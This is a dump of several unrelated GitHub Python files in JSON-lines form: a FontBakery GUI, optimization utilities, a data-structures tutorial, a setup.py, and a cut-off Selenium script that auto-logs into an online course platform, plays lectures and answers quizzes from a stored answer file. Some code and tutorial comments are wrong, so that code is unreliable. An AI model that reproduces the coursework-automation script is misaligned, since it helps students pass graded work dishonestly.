binder.bind(DatabaseConnectionManager, database_connection)\n\n # 3. 
bind repositories\n user_repository = UserRepository(database=database_connection)\n binder.bind(UserRepository, user_repository)\n\n # 4. bind services\n user_service = UserService(user_repository=user_repository)\n binder.bind(UserService, user_service)\n\n google_oauth2_service = GoogleOAuth2Service(\n config=config, user_repository=user_repository\n )\n binder.bind(GoogleOAuth2Service, google_oauth2_service)\n","repo_name":"kkjsw17/mas-server-v2","sub_path":"mas-api/api/api_initializer.py","file_name":"api_initializer.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24433831504","text":"import sys\nfrom PyQt5.QtWidgets import (\n QApplication,\n QLabel,\n QVBoxLayout,\n QHBoxLayout,\n QWidget,\n QComboBox,\n QDialog,\n QDialogButtonBox,\n QMessageBox,\n QProgressBar,\n QPushButton,\n QFileDialog\n)\nfrom PyQt5.QtCore import QThread, QSettings, Qt, QSize\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nimport re\nimport subprocess\nimport sys\nimport platform\nimport os\nfrom fontbakery.commands.check_profile import log_levels\nfrom fontbakery.profile import get_module_profile\nfrom importlib import import_module\n\nif platform.system() == \"Windows\":\n import win32clipboard\n\nos.environ[\"QT_MAC_WANTS_LAYER\"] = \"1\"\n\nprint(sys.path)\n\nimport site # Needed for py2app\n\nfrom qfontbakery.selfupdate import needs_update, update_dialog\nfrom qfontbakery.dragdrop import DragDropArea\nfrom qfontbakery.fbinterface import FontbakeryRunner\n\n# Make hidden imports visible, for pyinstaller\nimport fontbakery.profiles.googlefonts\nimport fontbakery.profiles.adobefonts\nimport fontbakery.profiles.notofonts\nimport fontbakery.profiles.opentype\nimport fontbakery.profiles.universal\n\nfrom fontbakery.cli import CLI_PROFILES\n\nclass CheckCombo(QComboBox):\n def __init__(self, profile):\n super().__init__()\n imported = import_module(\"fontbakery.profiles.\"+profile)\n profile = get_module_profile(imported)\n self.setMaxVisibleItems(10)\n self.setStyleSheet(\"combobox-popup: 0;\")\n self.profile = profile\n for _, section in profile._sections.items():\n self.addItem(section.name)\n item = self.model().item(self.count()-1,0)\n font = QFont()\n font.setBold(True)\n item.setFont(font)\n item.setFlags(item.flags() & ~Qt.ItemIsSelectable)\n item.setCheckState(Qt.Unchecked)\n\n for check in section._checks:\n self.addItem(check.description,userData = check.id)\n item = self.model().item(self.count()-1,0)\n item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n item.setCheckState(Qt.Checked)\n self.adjustSize()\n\n def checked_checks(self):\n rv = []\n for i in range(0, self.count()):\n item = self.model().item(i)\n if item.checkState() != Qt.Checked or not self.itemData(i):\n continue\n rv.append(self.itemData(i))\n return rv\n\n def sizeHint(self):\n return self.minimumSizeHint()\n\n def minimumSizeHint(self):\n return QSize(50, super().minimumSizeHint().height())\n\n\nclass ResultsWidget(QWidget):\n def __init__(self, html, markdown):\n super(ResultsWidget, self).__init__()\n self.markdown = markdown\n QBtn = QDialogButtonBox.Ok\n self.layout = QVBoxLayout()\n self.webrenderer = QWebEngineView()\n self.webrenderer.setHtml(html)\n self.layout.addWidget(self.webrenderer)\n self.setMinimumHeight(400)\n\n if platform.system() in [\"Darwin\", \"Windows\"]:\n self.mdbutton = QPushButton(\"Copy Markdown to clipboard\")\n 
self.mdbutton.clicked.connect(self.md_to_clipboard)\n self.layout.addWidget(self.mdbutton)\n self.setLayout(self.layout)\n\n def md_to_clipboard(self):\n if platform.system() == \"Darwin\":\n self.setClipboardDataMac(self.markdown)\n else:\n self.setClipboardDataWin(self.markdown)\n self.mdbutton.setText(\"Copied!\")\n\n def setClipboardDataWin(self, data):\n win32clipboard.EmptyClipboard()\n win32clipboard.SetClipboardData(win32clipboard.CF_TEXT, data)\n\n def setClipboardDataMac(self, data):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(data.encode(\"utf-8\"))\n p.stdin.close()\n retcode = p.wait()\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(QWidget, self).__init__()\n self.settings = QSettings()\n geometry = self.settings.value('mainwindowgeometry', '')\n if geometry:\n self.restoreGeometry(geometry)\n self.vlayout = QVBoxLayout()\n self.layout = QVBoxLayout()\n self.left = QWidget()\n self.left.setLayout(self.vlayout)\n self.right = QWidget()\n self.layout.addWidget(self.left)\n self.layout.addWidget(self.right)\n self.setLayout(self.layout)\n self.vlayout.addWidget(QLabel(\"Choose profile to check:\"))\n self.profilewidget = QComboBox()\n for p in CLI_PROFILES:\n self.profilewidget.addItem(p)\n last_used_profile = self.settings.value(\"last_used_profile\", \"\")\n if last_used_profile:\n self.profilewidget.setCurrentText(last_used_profile)\n self.vlayout.addWidget(self.profilewidget)\n\n self.profilewidget.currentIndexChanged.connect(self.profile_changed)\n\n self.vlayout.addWidget(QLabel(\"Choose checks to run:\"))\n self.checkwidget = CheckCombo(self.profilewidget.currentText())\n self.vlayout.addWidget(self.checkwidget)\n\n self.vlayout.addWidget(QLabel(\"Choose level of output:\"))\n self.loglevelwidget = QComboBox()\n for l in log_levels.keys():\n self.loglevelwidget.addItem(l)\n self.loglevelwidget.setCurrentText(\"INFO\")\n self.vlayout.addWidget(self.loglevelwidget)\n\n self.vlayout.addWidget(DragDropArea(self))\n\n self.progress = QProgressBar(self)\n self.progress.setMinimum(0)\n self.progress.setMaximum(100)\n self.progress.setValue(0)\n self.vlayout.addWidget(self.progress)\n self.vlayout.addStretch()\n\n def run_fontbakery(self, paths):\n self.progress.setValue(0)\n # Setup the worker object and the worker_thread.\n profilename = self.profilewidget.currentText()\n loglevel = log_levels[self.loglevelwidget.currentText()]\n self.settings.setValue('last_used_profile', profilename)\n print(\"checked_checks\", self.checkwidget.checked_checks())\n self.worker = FontbakeryRunner(profilename, [loglevel], paths, checks=self.checkwidget.checked_checks())\n self.worker_thread = QThread()\n self.worker.moveToThread(self.worker_thread)\n self.worker_thread.started.connect(self.worker.start)\n self.worker.signalStatus.connect(self.show_results)\n self.worker.progressStatus.connect(self.update_progress)\n self.worker_thread.start()\n\n def update_progress(self, value):\n self.progress.setValue(int(value))\n\n def show_results(self, html, md):\n self.worker_thread.quit()\n self.layout.removeWidget(self.right)\n self.right.deleteLater()\n self.right = ResultsWidget(html, md)\n self.layout.addWidget(self.right)\n\n def profile_changed(self):\n index = self.vlayout.indexOf(self.checkwidget)\n self.vlayout.removeWidget(self.checkwidget)\n self.checkwidget.deleteLater()\n self.checkwidget = CheckCombo(self.profilewidget.currentText())\n self.vlayout.insertWidget(index, self.checkwidget)\n\n def closeEvent(self, event):\n geometry = 
self.saveGeometry()\n self.settings.setValue('mainwindowgeometry', geometry)\n\n\n# # start my_app\nmy_app = QApplication(sys.argv)\nmy_app.setApplicationName(\"FontBakery\")\nmy_app.setOrganizationDomain(\"fonts.google.com\")\n\nmainwindow = MainWindow()\nmainwindow.raise_()\nmainwindow.adjustSize()\nmainwindow.setMinimumWidth(400)\nmainwindow.show()\nver = needs_update()\nif ver:\n update_dialog(ver)\nsys.exit(my_app.exec_())\n","repo_name":"googlefonts/fontbakery-ui","sub_path":"qfontbakery.py","file_name":"qfontbakery.py","file_ext":"py","file_size_in_byte":7543,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"24359111369","text":"# Floating point numbers are created with decimal points\n1.0\n1.5\n1000.1\n\n# They are not precise (note how they get progressively more wrong)\nnum = 0.0\nfor i in range(100):\n num += .01\n print(num)\n\n# Adding integers and floats returns a float\nprint(1 + 1.0)\n\n1 + 1 # addition\n1 - 1 # subtraction\n2 * 2 # multiplication\n10/5 # divison (returns float)\n10//3 # integer divison (returns integer)\n10 % 3 # modulo, returns remainder\n2**4 # exponential","repo_name":"vierth/hcs","sub_path":"somemath.py","file_name":"somemath.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29146133215","text":"import math\r\nfrom scipy import integrate\r\nfrom pulp import *\r\n\r\n\r\nclass methods:\r\n\r\n def Qi_percent():\r\n Qi1 = -168\r\n Qi2 = 16968\r\n for i in range(77):\r\n Qi1 += 168\r\n Qi2-=168\r\n print('port 1 cargo shipment in month:', Qi1)\r\n print('port 2 cargo shipment in month:', Qi2)\r\n\r\n def Zi(Pi, Q2, diOd):\r\n Z2 = Pi * Q2 * diOd\r\n return Z2\r\n\r\n def my_ui_func(u):\r\n return math.exp(-u ** 2)\r\n\r\n def BodRo(f, diOd, Di, EF, LF, Qi, V, phi):\r\n EL_Ro = 2.547 + 4 + 0.03 + 2 + 1.65\r\n BodRo = (f * diOd * Di * (EF * LF * EL_Ro + phi * EL_Ro)) / (Qi * V * phi * 1e6)\r\n return BodRo\r\n\r\n def BodRao(f_tilde, dOs, Di, EF_tilde, LF, Qi, V_tilde, phi, f, dOd, V, EF):\r\n ELRa = 2.547 + 2.01 + 0.134 + 7.37 + 0.402\r\n ELRo = 2.547 + 4 + 0.03 + 2 + 1.65\r\n BodRao = (f_tilde * dOs * Di * (EF_tilde * LF * ELRa + phi * ELRa)) / (Qi * V_tilde * phi) + \\\r\n (f * (dOd - dOs) * Di * (EF * LF * ELRo + phi * ELRo)) / (Qi * V * phi * 1e6)\r\n return BodRao\r\n\r\n def A(alpha, C, BodRo, BodRao):\r\n A = alpha * C * (BodRo - BodRao)\r\n return A\r\n\r\n def B(tau, C, BodRo, BodRao):\r\n B = tau * C * (BodRo - BodRao)\r\n return B\r\n\r\n def THi(Oi, Di, j):\r\n THij = Oi * Di ** j\r\n return THij\r\n\r\n def TC_i(DXi, xi, eps_Ro, eps_Ra, diOs, diOd):\r\n\r\n TCi1 = DXi * xi * (eps_Ro * (diOd - diOs) + eps_Ra * diOs)\r\n TCi2 = eps_Ro * DXi * xi * diOd\r\n TCi = TCi1 - TCi2\r\n return TCi\r\n\r\n def Ki(Di, Qi, ni):\r\n Ki = (Di - Qi) / ni\r\n return Ki\r\n\r\n def HRi(R, Ki):\r\n HRi = R * Ki\r\n return HRi\r\n\r\n def TCi(TCi0, TCi, HRi):\r\n TCi = TCi0 + TCi + HRi\r\n return TCi\r\n\r\n def Ei(Di, Qi, Hi, j):\r\n Eij = (Di - Qi) * Hi ** j\r\n return Eij\r\n\r\n def Pi(Zi, A, B, TCi):\r\n Pi1 = Zi + A - TCi\r\n Pi2 = Zi - B - TCi\r\n Pi = Pi1 - Pi2\r\n return Pi\r\n\r\n def TGR(Di, Pi, diOd, tau, omega, alpha):\r\n TGR = 0\r\n for i in range(1, 3):\r\n TGR += diOd[i-1] * Di[i-1] * Pi[i-1] * (tau - omega - alpha)\r\n return TGR\r\n\r\n def TSW(pi_list, ui_func, u_start, u_end):\r\n TSW = sum(pi_list)\r\n TSW += integrate.quad(ui_func, u_start, u_end)[0]\r\n return TSW\r\n\r\n def 
TER(BodRo, BodRao):\r\n TER = sum(BodRo) + sum(BodRao)\r\n return TER\r\n\r\n def max_tgr(L_TSW, L_TER):\r\n prob = LpProblem(\"Max TGR\", LpMaximize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TGR\r\n\r\n prob += TSW >= L_TSW\r\n prob += TER <= L_TER\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n tgr = value(TGR.varValue)\r\n tsw = value(TSW.varValue)\r\n ter = value(TER.varValue)\r\n return status, tgr, tsw, ter\r\n\r\n\r\n def max_tsw(L_TGR, L_TER):\r\n prob = LpProblem(\"Max TSW\", LpMaximize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TSW\r\n\r\n prob += TGR >= L_TGR\r\n prob += TER <= L_TER\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n tsw = value(TSW.varValue)\r\n tgr = value(TGR.varValue)\r\n ter = value(TER.varValue)\r\n return status, tsw, tgr, ter\r\n\r\n def min_ter(L_TGR, L_TSW):\r\n prob = LpProblem(\"Min TER\", LpMinimize)\r\n\r\n TSW = LpVariable(\"TSW\", lowBound=None)\r\n TER = LpVariable(\"TER\", lowBound=None)\r\n TGR = LpVariable(\"TGR\", lowBound=None)\r\n\r\n prob += TER\r\n\r\n prob += TGR >= L_TGR\r\n prob += TSW >= L_TSW\r\n\r\n prob.solve()\r\n\r\n status = LpStatus[prob.status]\r\n ter = value(TER.varValue)\r\n tgr = value(TGR.varValue)\r\n tsw = value(TSW.varValue)\r\n return status, ter, tgr, tsw\r\n\r\n#RL\r\nclass rl:\r\n\r\n def find_min_max(triad_list):\r\n\r\n min_triad = triad_list[0]\r\n max_triad = triad_list[0]\r\n\r\n for triad in triad_list:\r\n\r\n if triad < min_triad:\r\n min_triad = triad\r\n\r\n if triad > max_triad:\r\n max_triad = triad\r\n\r\n triad_list = max_tgr, max_tsw, min_ter\r\n min_triad, max_triad = find_min_max(triad_list)\r\n\r\n print(\":\", min_triad)\r\n print(\":\", max_triad)\r\n\r\n return (min_triad, max_triad)\r\n\r\n#CART\r\nclass cart:\r\n\r\n def find_min_max(triad_list):\r\n\r\n triad_int_list = [int(triad.replace(\"T\", \"\")) for triad in triad_list]\r\n\r\n min_triad = triad_int_list[0]\r\n max_triad = triad_int_list[0]\r\n\r\n for triad in triad_int_list:\r\n\r\n if triad < min_triad:\r\n min_triad = triad\r\n\r\n if triad > max_triad:\r\n max_triad = triad\r\n\r\n min_triad_str = \"T\" + str(min_triad)\r\n max_triad_str = \"T\" + str(max_triad)\r\n\r\n triad_list = ['max_tgr', 'max_tsw', 'min_ter']\r\n\r\n min_triad, max_triad = find_min_max(triad_list)\r\n\r\n print(\":\", min_triad)\r\n print(\":\", max_triad)\r\n\r\n return (min_triad_str, max_triad_str)\r\n\r\n#C4.5\r\nclass c45:\r\n\r\n def entropy(class_counts):\r\n\r\n total_count = sum(class_counts)\r\n entropy = 0\r\n\r\n for count in class_counts:\r\n if count == 0:\r\n continue\r\n frequency = count / total_count\r\n entropy += -frequency * math.log2(frequency)\r\n\r\n return entropy\r\n\r\n def split_data(data, attribute_index):\r\n\r\n split_data = {}\r\n\r\n for instance in data:\r\n attribute_value = instance[attribute_index]\r\n if attribute_value not in split_data:\r\n split_data[attribute_value] = []\r\n split_data[attribute_value].append(instance)\r\n\r\n return split_data\r\n\r\n def choose_attribute(data, attribute_indices):\r\n\r\n class_counts = {}\r\n\r\n for instance in data:\r\n class_label = instance[-1]\r\n if class_label not in class_counts:\r\n class_counts[class_label] = 0\r\n class_counts[class_label] += 1\r\n\r\n base_entropy = entropy(list(class_counts.values()))\r\n\r\n 
best_attribute_index = None\r\n best_information_gain = 0\r\n\r\n for attribute_index in attribute_indices:\r\n attribute_values = set([instance[attribute_index] for instance in data])\r\n attribute_entropy = 0\r\n\r\n for attribute_value in attribute_values:\r\n attribute_data = [instance for instance in data if instance[attribute_index] == attribute_value]\r\n attribute_frequency = len(attribute_data) / len(data)\r\n attribute_entropy += attribute_frequency * entropy([count for value, count in\r\n class_counts.items() if any(instance[-1] == value\r\n for instance in attribute_data)])\r\n\r\n information_gain = base_entropy - attribute_entropy\r\n\r\n if information_gain > best_information_gain:\r\n best_attribute_index = attribute_index\r\n best_information_gain = information_gain\r\n\r\n return best_attribute_index\r\n\r\n def majority_class(class_labels):\r\n\r\n class_counts = {}\r\n\r\n for class_label in class_labels:\r\n if class_label not in class_counts:\r\n class_counts[class_label] = 0\r\n class_counts[class_label] += 1\r\n\r\n return max(class_counts, key=class_counts.get)\r\n\r\n def c45(data, attribute_indices):\r\n\r\n class_labels = [instance[-1] for instance in data]\r\n\r\n if len(set(class_labels)) == 1:\r\n return class_labels[0]\r\n\r\n if not attribute_indices:\r\n return majority_class(class_labels)\r\n\r\n chosen_attribute_index = choose_attribute(data, attribute_indices)\r\n tree = {chosen_attribute_index: {}}\r\n attribute_indices.remove(chosen_attribute_index)\r\n\r\n for attribute_value, attribute_data in split_data(data, chosen_attribute_index).items():\r\n subtree = c45(attribute_data, attribute_indices[:])\r\n tree[chosen_attribute_index][attribute_value] = subtree\r\n\r\n return tree\r\n\r\n def find_min_max(triad_list):\r\n\r\n triad_int_list = [int(triad.replace(\"T\", \"\")) for triad in triad_list]\r\n\r\n data = [[triad] for triad in triad_int_list]\r\n\r\n for instance in data:\r\n instance.append(0)\r\n\r\n attribute_indices = [0] \r\n tree = c45(data, attribute_indices)\r\n\r\n current_node = tree\r\n\r\n while isinstance(current_node, dict):\r\n attribute_index = list(current_node.keys())[0]\r\n subtree_key = str(min(triad_int_list)) if \"T\" + str(min(triad_int_list)) in current_node[attribute_index] else str(max(triad_int_list))\r\n current_node = current_node[attribute_index][subtree_key]\r\n\r\n min_triad_str = \"T\" + str(current_node)\r\n max_triad_str = \"T\" + str(current_node)\r\n\r\n return (min_triad_str, max_triad_str)","repo_name":"ArmagBi/GasPrice_Analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31282025500","text":"# -*- coding: utf-8 -*-\n\n###########################################################################\n#\n# _ _____ _____ _______\n# | | |_ _|/ ____|__ __|\n# | | | | | (___ | |\n# | | | | \\___ \\ | |\n# | |____ _| |_ ____) | | |\n# |______|_____|_____/ |_|\n#\n#\n###########################################################################\n\n###\n#\n# List is a mutable sequence-like data structure\n# Complexity of element access O(1)\n# Complexity of element change O(1)\n# Complexity of element appending O(1) (amortized case)\n# Complexity of element deletion O(n)\n#\n##\n\n# list declaration\na = [1, 2, 3, 4]\n\n# entries in list can be of any type, a not all of them have to be of same color\na = [1, 2, \"string\", 3, 4]\na = [1, 2, [3, 4], \"string\", 5, 6, 
7]\n\n# accessing list element\n# list indexing starts with 0\nanswer = a[0] # answer = 0\nanswer = a[2] # answer = [3, 4]\n\n# list slicing\n# one can obtain a subsequence from original list\n# specified subsequence range is inclusive on the left, but non-inclusive on the right\nanswer = a[0:2] # answer = [1, 2]\nanswer = a[1:3] # answer = [2, [3, 4]]\n\n# one can specify the gap / step for elements to be taken from the range with\nanswer = a[0:4:2] # answer = [1, [3, 4]]\nanswer = a[0:6:3] # answer = [1, \"string\"]\n\n# you can access elements from the end of list with negative indexing\nanswer = a[-1] # answer = 7\nanswer = a[-5] # answer = [3, 4]\nanswer = a[8:0:-1] # answer = [7, 6, 5, \"string\", [3, 4], 2]\n\n# one can omit star / end indices when slicing\nanswer = a[:2] # answer = [1, 2]\nanswer = a[:4:2] # answer = [1, [3, 4]]\n\n# to change the element at certain position just assign a new value with a specific index\na = [1, 2, 3, 4, 5, 6, 7]\na[2] = 3.5 # a = [1, 2, 3.5, 4, 5, 6, 7]\na[:2] = [2, 1] # a = [2, 1, 3.5, 4, 5, 6, 7]\n\n# when a list is assigned to several variables, they refer to the same object and changes in that object are reflected in all variables\na = [1, 2, 3, 4]\nb = a\na[2] = 2.5\nanswer = b[2] # answer = 2.5\n\n# deleting an element by its index\nanswer = a # answer = [1, 2.5, 3, 4]\ndel a[0]\nanswer = a # answer = [2.5, 3, 4]\n\n# One can construct a list in multiple ways.\n# Simplest way is to create a new empty list and then use a method append / insert to add elements into it\na = []\na.append(1) # a = [1]\na.append(2) # a = [1, 2]\na.insert(0, -1) # a = [-1, 2, 2]\n\n# another way to create a new list is to use so called list comprehension\n# this is usually used when there is a need to create a new collection from already existing one\na = [str(x) for x in [1, 2, 3, 4]] # a = ['1', '2', '3', '4']\n# one can also put conditions into such list creation, thus utilizing the filter pattern\na = [str(x) for x in [1, 2, 3, 4] if x % 2 == 0] # a = ['2', '4']\n\n# list comprehension can be nested (more than 2 levels of iterations are not encouraged in list comprehension)\na = [str(x * y) for y in [1, 2, 3] for x in [1, 2, 3, 4] if x % 2 == 0] # a = ['2', '4', '4', '8', '6', '12']\n# a = ['1 * 2', '1 * 4', '2 * 2', '2 * 4', '3 * 2', '3 * 4']\n\n###########################################################################\n#\n# _______ _\n# |__ __| | |\n# | |_ _ _ __ | | ___\n# | | | | | '_ \\| |/ _ \\\n# | | |_| | |_) | | __/\n# |_|\\__,_| .__/|_|\\___|\n# | |\n# |_|\n#\n###########################################################################\n\n###\n#\n# Tuple is a Immutable sequence-like data structure\n# Complexity of element access O(1)\n#\n##\n\n# tuples correspond to the unchanging sequences of objects\na = (1, \"string\", [1, 2], 4)\n\n# accessing elements works the same way the list elements accessing works\nanswer = a[3] # answer = 4\n\n# you can not reassign a new element to the specific spot in the tuple\n# THIS LINE IS A PROGRAMMING ERROR\na[1] = 3\n\n# if a tuple entry itself is mutable (like list), it can be changed internally, while the tuple structure will be intact\nanswer = a[2] # answer = [1, 2], a = (1, \"string\", [1, 2], 4)\na[2][0] = 3\nanswer = a[2] # answer = [3, 2], a = (1, \"string\", [3, 2], 4)\n\n# one can convert a list into a tuple by simply calling ``tuple`` function on it\na = [1, 2, 3, 4]\nanswer = tuple(a) # answer = (1, 2, 3, 4)\n\n###########################################################################\n# _____ _ _ 
_\n# | __ \\(_) | | (_)\n# | | | |_ ___| |_ _ ___ _ __ __ _ _ __ _ _\n# | | | | |/ __| __| |/ _ \\| '_ \\ / _` | '__| | | |\n# | |__| | | (__| |_| | (_) | | | | (_| | | | |_| |\n# |_____/|_|\\___|\\__|_|\\___/|_| |_|\\__,_|_| \\__, |\n# __/ |\n# |___/\n#\n###########################################################################\n\n###\n#\n# Dictionaries is a mutable key-value data structure\n# Complexity of element access O(1) (Amortized O(n))\n# Complexity of element setting O(1) (Amortized O(n))\n# Complexity of element deletion O(1) (Amortized O(n))\n#\n##\n\n# Dictionary declaration\n# Keys go before \":\" character. Any hashable object can be a key\n# Values go after \":\" character. Any object can be a value\na = {} # empty dictionary declaration\na = {1: \"1\", \"2\": 2}\n\n# Element setting\na[3] = \"3\"\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: \"3\"}\n\n# Setting a new value to the already existing key overwrites previously set value\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: \"3\"}\na[3] = 4\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: 4}\n\n# Element accessing\nanswer = a[3] # answer = 4\n\n# Element deleting\ndel a[4]\nanswer = a # answer = {1: \"1\", \"2\": 2}\n\n\n# one can create a dictionary by using dict comprehensions, that are similar to list comprehensions, but with a slightly different syntax\n# this is, again, often used when one needs to create a dictionary based on the already existing collection of elements\na = {x: str(x) for x in [1, 2, 3, 4]} # a = {1: '1', 2: '2', 3: '3', 4: '4'}\n# condition is also allowed\na = {x: str(x) for x in [1, 2, 3, 4] if x % 2 == 0} # a = {2:'2', 4:'4'}\n# a nested iteration can be utilized as well, though, as well as in list case, more than two levels of collections are discouraged\n# in the comprehension syntax\na = {x * y: str(y) for y in [1, 2, 3] for x in [1, 2, 3, 4] if x % 2 == 0} # a = {2: '1', 4: '2', 8: '2', 6: '3', 12: '3'}\n\n\n###########################################################################\n#\n# _____ _\n# / ____| | |\n# | (___ ___| |_\n# \\___ \\ / _ \\ __|\n# ____) | __/ |_\n# |_____/ \\___|\\__|\n#\n#\n###########################################################################\n\n###\n#\n# Dictionaries is a mutable non ordered data structure of unique entries\n# Complexity of element addition O(1)\n# Complexity of element deletion O(n)\n#\n##\n\n# Set declaration\na = {1, 2, 3}\na = set() # empty set declaration. 
Can not do it with {}, as that is the way to declare empty an empty dictionary\n\n# Element addition\na.add(3)\nanswer = a # answer = {3}\n# Adding same element multiple times doesn't result in multiple entries\na.add(3)\nanswer = a # answer = {3}\n\n# Element deletion\na.remove(3)\nanswer = a # answer = {3}\n","repo_name":"aganezov/algo_bioinf","sub_path":"python_background/builtin_data_structures.py","file_name":"builtin_data_structures.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7280791023","text":"from setuptools import setup, find_packages\nimport pathlib\n\n# Reading the long description from README.md\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"pylite\",\n version=\"0.0.1\",\n python_requires=\">=3.9\",\n description=\"An SQLite ORM for Python, inspired by Laravel's Eloquent.\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/benhmoore/PyLite\",\n author=\"Ben Moore\",\n author_email=\"ben@benhmoore.com\",\n license=\"MIT\", # Assuming the license in LICENSE.txt is MIT\n classifiers=[\n \"Programming Language :: Python :: 3.9\",\n # Add other relevant classifiers\n ],\n packages=find_packages(), # assuming your package is organized correctly\n install_requires=[\"colorama\", \"inflect\"],\n)\n","repo_name":"benhmoore/PyLite","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35193775015","text":"# 导入\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport re\n\n\n\n# 定义常量\n# 用于匹配题目的正则表达式\nFindProblemText = re.compile(r'】.*?[??((。::]+')\nFindChineseText = re.compile(r'[\\u4e00-\\u9fa5]+')\n# 用于匹配答案的字符串和列表\ndaan = '答案'\nanswers = ['A','B','C','D','√','×']\n# 读取题库\nfile = open('answer.txt','rb')\nlines = file.readlines()\nfile.close()\n# 支持的学校\nSupportSchool = {'1':['上海大学','SHU'],'2':['其他单位','others']}\nfor i in SupportSchool :\n print(i,SupportSchool[i][0],SupportSchool[i][1])\n# 学校,用户名,密码,课程链接\nSchoolName = input('请输入学校序号')\nSchoolName = SupportSchool[SchoolName][1]\nUserName = input('请输入用户名')\nPassword = input('请输入密码')\nClassUrl = input('请输入课程链接')\n\n\ndef login(school,username,password,WebDriver) :\n ''' \n 登录,参数:学校,用户名,密码,webdriver\n '''\n if school == 'SHU' : # 上海大学\n while True :\n try :\n WebDriver.get(\"http://www.elearning.shu.edu.cn/portal\")\n break\n except :\n continue\n # 定位登录按钮并点击\n LoginButton = WebDriver.find_element_by_css_selector('.loginSub') \n LoginButton.click()\n # 用户名密码输入框,提交按钮\n UsernameInput = WebDriver.find_element_by_name('username')\n PasswordInput = WebDriver.find_element_by_name('password')\n LoginSubmit = WebDriver.find_element_by_name('login_submit')\n # 输入用户名密码,提交 \n InputAction = webdriver.ActionChains(WebDriver)\n InputAction.click(UsernameInput)\n InputAction.send_keys_to_element(UsernameInput,username)\n InputAction.click(PasswordInput)\n InputAction.send_keys_to_element(PasswordInput,password)\n InputAction.click(LoginSubmit)\n InputAction.perform()\n else :\n WebDriver.get('http://www.xuexi365.com/') # 超星平台登录\n # 选择单位\n ChooseSchool = WebDriver.find_element_by_class_name('Select')\n ChooseSchool.click()\n # 搜索学校\n SchoolNameSearch = input('请输入学校名称')\n SearchBar = WebDriver.find_element_by_class_name('zw_t_input')\n SearchButton = 
WebDriver.find_element_by_class_name('zw_t_btn')\n SearchSchool = webdriver.ActionChains(WebDriver)\n SearchSchool.click(SearchBar)\n SearchSchool.send_keys_to_element(SearchBar,SchoolNameSearch)\n SearchSchool.click(SearchButton)\n SearchSchool.perform()\n time.sleep(3)\n # 搜索结果\n SearchAnswers = WebDriver.find_elements_by_css_selector('.zw_m_li')\n for i in range(len(SearchAnswers)) :\n if SearchAnswers[i].is_displayed():\n name = SearchAnswers[i].get_attribute('textContent')\n print(i,name)\n SchoolNumber = input('请输入序号')\n SearchAnswers[int(SchoolNumber)].click()\n # 用户名密码输入框,提交按钮\n UsernameInput = WebDriver.find_element_by_name('uname')\n PasswordInput = WebDriver.find_element_by_name('password')\n VerifyCodeInput = WebDriver.find_element_by_name('numcode')\n LoginSubmit = WebDriver.find_element_by_name('button')\n VerifyCode = input('请输入验证码')\n # 输入用户名密码,提交 \n InputAction = webdriver.ActionChains(WebDriver)\n InputAction.click(UsernameInput)\n InputAction.send_keys_to_element(UsernameInput,username)\n InputAction.click(PasswordInput)\n InputAction.send_keys_to_element(PasswordInput,password)\n InputAction.click(VerifyCodeInput)\n InputAction.send_keys_to_element(VerifyCodeInput,VerifyCode)\n InputAction.click(LoginSubmit)\n InputAction.perform()\ndef GotoClass(WebDriver) :\n '''\n 前往课程页面,driver为必选参数\n '''\n WebDriver.get(ClassUrl)\ndef FindViedo (WebDriver) :\n '''\n 寻找视频\n '''\n VideoList = []\n VideoClassName = 'ans-insertvideo-online'\n frames = WebDriver.find_elements_by_tag_name('iframe')\n for i in range(len(frames)):\n frames = WebDriver.find_elements_by_tag_name('iframe')\n classname = frames[i].get_attribute('class')\n if VideoClassName in classname :\n VideoList.append(frames[i])\n return VideoList\ndef FindCourse(WebDriver) :\n '''\n 定位所有课\n '''\n courses = WebDriver.find_elements_by_class_name('articlename')\n return courses\ndef GotoCourse(course,WebDriver) :\n '''\n 下拉到一节课,然后跳转,参数:课,driver\n '''\n WebDriver.execute_script(\"arguments[0].scrollIntoView();\",course)\n course.click()\ndef ShowTitle(WebDriver) :\n '''\n 显示小节标题\n '''\n title = WebDriver.find_element_by_tag_name('h1').get_attribute('textContent')\n print(title)\ndef FindTestTag(WebDriver):\n '''\n 定位答题标签\n '''\n TestTag = WebDriver.find_element_by_id('dct2')\n print('发现题目')\n TestTag.click()\ndef PlayVideo(WebDriver) :\n '''\n 定位视频并播放\n '''\n video = WebDriver.find_element_by_class_name('ans-attach-ct')\n video.click()\n print('开始播放')\ndef isVideoOver(WebDriver) :\n '''\n 视频是否结束\n '''\n duration = 